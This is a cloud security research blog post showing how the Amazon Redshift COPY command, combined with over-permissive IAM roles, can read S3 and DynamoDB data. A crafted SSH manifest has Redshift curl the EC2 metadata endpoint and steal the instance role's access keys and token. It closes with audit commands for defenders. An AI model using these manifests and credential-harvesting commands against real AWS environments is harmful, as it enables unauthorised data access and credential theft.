Tools Resources

Amazon Redshift – COPY The Risk

author_profile
Dana Tsymberg
Wednesday, Mar 30th, 2022

TL;DR

Amazon Redshift is a fully managed petabyte-scale data warehouse service in the cloud, designed specifically for online analytics processing (OLAP) and business intelligence (BI) applications, which require complex queries against large datasets. Redshift is a powerful service, integrated with many data sources where some of them might include sensitive information. Therefore, it is important to understand the connections between the services and the potential attack surface.

In this post we are going to examine several ways an attacker could potentially access your sensitive data using Redshift COPY command.

Redshift manages the process of creating, operating, and scaling a data warehouse. It provides the option to interact with data stored in S3 or DynamoDB, as well as Athena and Glue using Redshift Spectrum. The service is based on PostgreSQL, but some of the commands are implemented differently.

Why does Redshift require roles?

As mentioned above, Redshift can integrate with many AWS services. To do so, it uses the roles that are associated with the cluster. The classic example is loading data from an S3 bucket. Redshift uses the 'COPY' command. The COPY command leverages the Amazon Redshift massively parallel processing (MPP) architecture to read and load data in parallel from data files. The files can be located in an Amazon Simple Storage Service (Amazon S3) bucket, an Amazon EMR cluster, or a remote host that is accessed using a Secure Shell (SSH) connection.

Redshift permits up to 50 IAM roles within the cluster (up to 10 in several AWS regions mentioned here). This option allows use of any of the roles to perform multiple data processing but if a wrong policy is attached to one of the roles, it may lead to excessive data access.

In the following two examples, we will examine how an attacker can access data stored in S3 and DynamoDB. We will use a simple .csv file that includes customer records (id, name, last name, city, country and occupation). We associated two roles within the cluster:

  • Role1: contains an inline policy related to S3
  • Role2: contains an inline policy related to DynamoDB

Using Redshift to read S3 content

Redshift enables the ability to load data from S3 and analyze it using SQL. The general template for loading data using the COPY command looks like this:

copy <table-name> from 's3://<your-bucket-name>/<folder>/<key_prefix>'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
options;

To use the COPY command successfully, COPY must have LIST access to the bucket and GET access to the bucket objects. For this example, we are using 'Role1' with the following policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "VisualEditor0",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": "*"
    }
  ]
}

To read all the content of customer.csv, we enter the following command:

copy customers from 's3://customers-bucket-1/load/customers.csv'
iam_role 'arn:aws:iam::123456789111:role/Role1'
DELIMITER ','
IGNOREHEADER 1;
Using Redshift to read S3 content_1

We can see that the data was loaded successfully to the 'customers' table. The next step is to query the data. Using a simple SQL command - 'SELECT * FROM customers;' we can see all data:

Using Redshift to read S3 content_2

Using Redshift to read a DynamoDB table

As mentioned in Amazon's documentation, Redshift permits the ability to load data from DynamoDB as well.

To do so, an attacker will need to first understand what tables are available in DynamoDB. The attacker will also need to list all the available tables using the following command in AWS CLI:

aws dynamodb list-tables

To demonstrate how to load data from DynamoDB, we will be using the same dataset from the example above. The dataset’s column values and their datatype can be inspected using the following AWS CLI command:

aws dynamodb scan --table-name customers
Using Redshift to read a DynamoDB table

Each attribute value is described as a name-value pair. The name is the data type, and the value is the data itself. The name 'S' represents string (other optional datatypes can be 'N' - number, 'B' - binary, 'SS' - string set, etc.).

Now that we have a better understanding about the data types, we can proceed to creating the table in Redshift. The new table will be called 'newcustomers':

Using Redshift to read a DynamoDB table_3

To read data from DynamoDB we will use this template:

copy <redshift_tablename> from 'dynamodb://<dynamodb_table_name>'
authorization readratio '<integer>';

The values for authorization are the AWS credentials needed to access the Amazon DynamoDB table. The user must have permission to SCAN and DESCRIBE the Amazon DynamoDB table that is being loaded.

The policy that is attached to 'Role2':

{
  "Version": "2012-10-17",
  "Statement": [
  {
    "Sid": "VisualEditor0",
    "Effect": "Allow",
    "Action": [
      "dynamodb:DescribeTable",
      "dynamodb:Scan"
    ],
    "Resource": "*"
  }
  ]
}

We modified the template:

modified the template

Now that the data is loaded into the table, an attacker can simply query it using SQL:

SELECT * FROM newcustomers;
modified the template

Using Redshift to run commands on EC2 instances:

The 'COPY' command can be used to load data from remote hosts as well, such as EC2 instances or other computers. COPY connects to the remote hosts using SSH and runs commands on the remote hosts to generate text outputs. The remote host can be an Amazon EC2 Linux Instance, or another Unix computer configured to accept SSH connections.

To connect to a remote host and run commands, an attacker will need to craft a manifest file containing endpoint details of the host and the command.

The format of the manifest file is in the following:<br>

{
  "entries":
  [
    {
      "endpoint": "<ssh_endpoint_or_IP>",
      "command": "<remote_command>",
      "mandatory": true,
      "publickey": "<public_key>",
      "username": "<host_user_name>"
    }
  ]
}

In the example below, we will try to extract the credentials of the role that is attached to our EC2 instance. To do so, we crafted the manifest file below to include the following entries:

{
  "entries":
  [
    {
      "endpoint": "ec2-11-222-333-44.compute-1.amazonaws.com",
      "command": "curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/",
      "mandatory": true,
      "username": "ec2-user"
    }
  ]
}

The command can be any command, from a simple echo to query a database or launch a script. In this example since we are trying to extract the credentials, we are querying the metadata of the EC2 instance using the command

curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/

In order to successfully load the data from the instance, we will first need to create a table in the Redshift cluster using the following command:

create table metadata (data text);

create table metadata

To use the manifest file, it must be uploaded to a S3 bucket. In this example the file was uploaded to a bucket called "dana-redshift-research".

Next, we used the copy command to load the manifest and create the SSH connection using the following command:

copy metadata
from 's3://dana-redshift-research/ssh_manifest' iam_role
'arn:aws:iam::123456789111:role/Role1'
TRUNCATECOLUMNS
ssh;

We received a confirmation message that the data was loaded successfully:

Using Redshift to run commands on EC2 instances:

Now, we can check the role that is attached to the EC2 instance by querying the table:

EC2 instance by querying the table

Great! Now that we have the role, we can use the curl command that was used in the first manifest file but with the role at the end of the URL:

{
  "entries":
  [
    {
      "endpoint": " ec2-11-222-333-44.compute-1.amazonaws.com",
      "command": "curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/dana-redshift-role",
      "mandatory": true,
      "username": "ec2-user"
    }
  ]
}

After uploading the file to the S3 bucket and repeating the last two commands of loading the data using the copy command and querying the table, we can finally get the access key, secret access key, and token.

 S3 bucket

With these credentials, an attacker can configure the profile using AWS configure and access assets.

Conclusion

Redshift is a great service for analyzing structured and semi-structured data.
It is important to understand how the service works to prevent unwanted access to sensitive data, therefore it is important to pay attention to the roles associated with the cluster and their policies.

How can you check your environment?

Prerequisites:

Check which roles are associated with your Redshift Cluster:

aws redshift describe-clusters | jq '.Clusters[] | .ClusterIdentifier, .IamRoles'

Check which EC2 instances contain Amazon Redshift public keys:

aws ssm send-command --document-name "AWS-RunShellScript" --targets <value> --parameters '{"commands":["#/bin/bash","cd .ssh && cat authorized_keys"],"workingDirectory":["/home/<ssh_username>"],"executionTimeout":["3600"]}'

Where --targets <value> is a list of EC2 instances separated by comma and <ssh_username> is the username of the instance (usually "ec2-user").

Once the command is executed:

aws ssm get-command-invocation --command-id <value> --instance-id <value> | jq '. as $p | .StandardOutputContent as $d | select($d | contains("Amazon-Redshift")) | if . then {"result": true, "match": .InstanceId} else {"result": false} end'

If the instance contains the public key of the Redshift cluster the output will be:

{
  "result": true,
  "match": "<instanceId>"
}

If the instance does not contain the public key of the Redshift cluster there will be no output.

Popup Image